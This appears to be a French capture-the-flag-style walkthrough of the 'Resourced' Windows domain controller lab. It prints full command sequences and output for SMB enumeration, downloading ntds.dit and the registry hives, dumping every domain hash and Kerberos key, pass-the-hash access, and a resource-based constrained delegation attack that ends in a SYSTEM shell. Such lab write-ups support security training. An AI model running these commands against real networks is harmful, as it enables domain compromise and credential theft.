# Resourced `smb` `sam` `bloodhound` * Nom machine : Resourced * Difficulté : Intermédiaire * OS : Windows ## Enumération ### NMAP ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:54 EDT Nmap scan report for 192.168.163.175 Host is up (0.036s latency). Not shown: 65514 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-30 13:56:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-08-30T13:58:06+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=ResourceDC.resourced.local | Not valid before: 2024-08-06T15:34:27 |_Not valid after: 2025-02-05T15:34:27 | rdp-ntlm-info: | Target_Name: resourced | NetBIOS_Domain_Name: resourced | NetBIOS_Computer_Name: RESOURCEDC | DNS_Domain_Name: resourced.local | DNS_Computer_Name: ResourceDC.resourced.local | DNS_Tree_Name: resourced.local | Product_Version: 10.0.17763 |_ System_Time: 2024-08-30T13:57:26+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49694/tcp open msrpc Microsoft Windows RPC 49712/tcp open msrpc Microsoft Windows RPC Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### SMB ``` ┌──(kali㉿kali)-[~] └─$ enum4linux 192.168.158.175 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 31 05:03:02 2024 {...} index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194! {...} ``` Nous avons une liste d'users et un mot de passe ! ``` ┌──(kali㉿kali)-[~] └─$ smbmap -H 192.168.158.175 -u V.Ventz -p 'HotelCalifornia194!' ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com https://github.com/ShawnDEvans/smbmap [*] Detected 1 hosts serving SMB [*] Established 1 SMB session(s) [+] IP: 192.168.158.175:445 Name: 192.168.158.175 Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share Password Audit READ ONLY SYSVOL READ ONLY Logon server share ``` ## Local exploitation ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ smbclient '//192.168.158.175/Password Audit' -U V.Ventz Password for [WORKGROUP\V.Ventz]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Tue Oct 5 04:49:16 2021 .. D 0 Tue Oct 5 04:49:16 2021 Active Directory D 0 Tue Oct 5 04:49:16 2021 registry D 0 Tue Oct 5 04:49:16 2021 7706623 blocks of size 4096. 2719140 blocks available smb: \> cd "Active directory" smb: \Active Directory\> dir . D 0 Tue Oct 5 04:49:16 2021 .. D 0 Tue Oct 5 04:49:16 2021 ntds.dit A 25165824 Mon Sep 27 07:30:54 2021 ntds.jfm A 16384 Mon Sep 27 07:30:54 2021 7706623 blocks of size 4096. 2719140 blocks available smb: \Active directory\> mget * Get file ntds.dit? yes Get file ntds.jfm? yes smb: \Active directory\> cd .. smb: \> cd registry smb: \registry\> dir . D 0 Tue Oct 5 04:49:16 2021 .. D 0 Tue Oct 5 04:49:16 2021 SECURITY A 65536 Mon Sep 27 06:45:20 2021 SYSTEM A 16777216 Mon Sep 27 06:45:20 2021 7706623 blocks of size 4096. 2719140 blocks available smb: \registry\> mget * Get file SECURITY? yes Get file SYSTEM? yes ``` {% embed url="" %} ### SECURITY ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ impacket-secretsdump -security SECURITY -system SYSTEM LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d [*] DPAPI_SYSTEM dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931 [*] NL$KM 0000 31 BF AC 76 98 3E CF 4A FC BD AD 0F 17 0F 49 E7 1..v.>.J......I. 0010 DA 65 A6 F9 C7 D4 FA 92 0E 5C 60 74 E6 67 BE A7 .e.......\`t.g.. 0020 88 14 9D 4D E5 A5 3A 63 E4 88 5A AC 37 C7 1B F9 ...M..:c..Z.7... 0030 53 9C C1 D1 6F 63 6B D1 3F 77 F4 3A 32 54 DA AC S...ock.?w.:2T.. NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac [*] Cleaning up... ``` ### ntds.dit ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94 [*] Reading and decrypting hashes from ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b::: M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45::: K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c::: L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808::: J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726::: V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c::: S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939::: P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe::: R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac::: D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35::: G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2::: [*] Kerberos keys from ntds.dit Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8 Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2 Administrator:des-cbc-md5:80861f1a80f1232f RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4 RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a RESOURCEDC$:des-cbc-md5:ab089e317a161cc1 krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5 krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a krbtgt:des-cbc-md5:f1b602194f3713f8 M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04 M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9 M.Mason:des-cbc-md5:268501b50e0bf47c K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115 K.Keen:des-cbc-md5:572cce13b38ce6da L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6 L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6 J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087 J.Johnson:des-cbc-md5:ea01d3d69d7c57f4 V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d V.Ventz:des-cbc-md5:4af77a3d1cf7c480 S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085 S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a S.Swanson:des-cbc-md5:5d37583eae1f2f34 P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230 P.Parker:des-cbc-md5:083b37079dcd764f R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef R.Robinson:des-cbc-md5:7051d568dfd0852f D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3 D.Durant:des-cbc-md5:376119bfcea815f8 G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91 G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7 G.Goldberg:des-cbc-md5:3e20fd1a25687673 [*] Cleaning up... ``` Nous avons crée un fichier user et un autre contenant les hashs (la partie NT c'est-à-dire la dernière). ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ crackmapexec ldap 192.168.158.175 -u user.txt -H hashs.txt -d resourced.local --continue-on-success {...} WINRM 192.168.158.175 5985 192.168.158.175 [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!) {...} ``` ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ evil-winrm -i 192.168.158.175 -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami resourced\l.livingstone ``` ## Escalade de privilège
``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ bloodhound-python -u L.Livingstone --hashes 'aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808' -d resourced.local -v --zip -c All -ns 192.168.158.175 ``` Nous avons marqué Livingstone "Owned". Nous avons ensuite cliqué sur Resourced.resourced.local et continué d'énumérer. Dans Inbound Control Rights, on peut voir "GenericAll" ### Resource Based Constrained Delegation {% embed url="" %} ``` ┌──(kali㉿kali)-[~/oscp/ress] └─$ impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.158.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Successfully added machine account ATTACK$ with password AttackerPC1!. ┌──(kali㉿kali)-[~] └─$ sudo python3 rbcd.py -dc-ip 192.168.158.175 -t RESOURCEDC -f 'ATTACK' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Starting Resource Based Constrained Delegation Attack against RESOURCEDC$ [*] Initializing LDAP connection to 192.168.158.175 [*] Using resourced\l.livingstone account with password *** [*] LDAP bind OK [*] Initializing domainDumper() [*] Initializing LDAPAttack() [*] Writing SECURITY_DESCRIPTOR related to (fake) computer `ATTACK` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `RESOURCEDC` [*] Delegation rights modified succesfully! [*] ATTACK$ can now impersonate users on RESOURCEDC$ via S4U2Proxy ┌──(kali㉿kali)-[~] └─$ impacket-getST -spn cifs/resourcedc.resourced.local resourced/attack\$:'AttackerPC1!' -impersonate Administrator -dc-ip 192.168.158.175 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache ┌──(kali㉿kali)-[~] └─$ export KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache ``` Ajouter : resourcedc.resourced.local à /etc/hosts ``` ┌──(kali㉿kali)-[~] └─$ impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.158.175 Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Requesting shares on resourcedc.resourced.local..... [*] Found writable share ADMIN$ [*] Uploading file wbKqIxpq.exe [*] Opening SVCManager on resourcedc.resourced.local..... [*] Creating service jEDp on resourcedc.resourced.local..... [*] Starting service jEDp..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.2145] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ```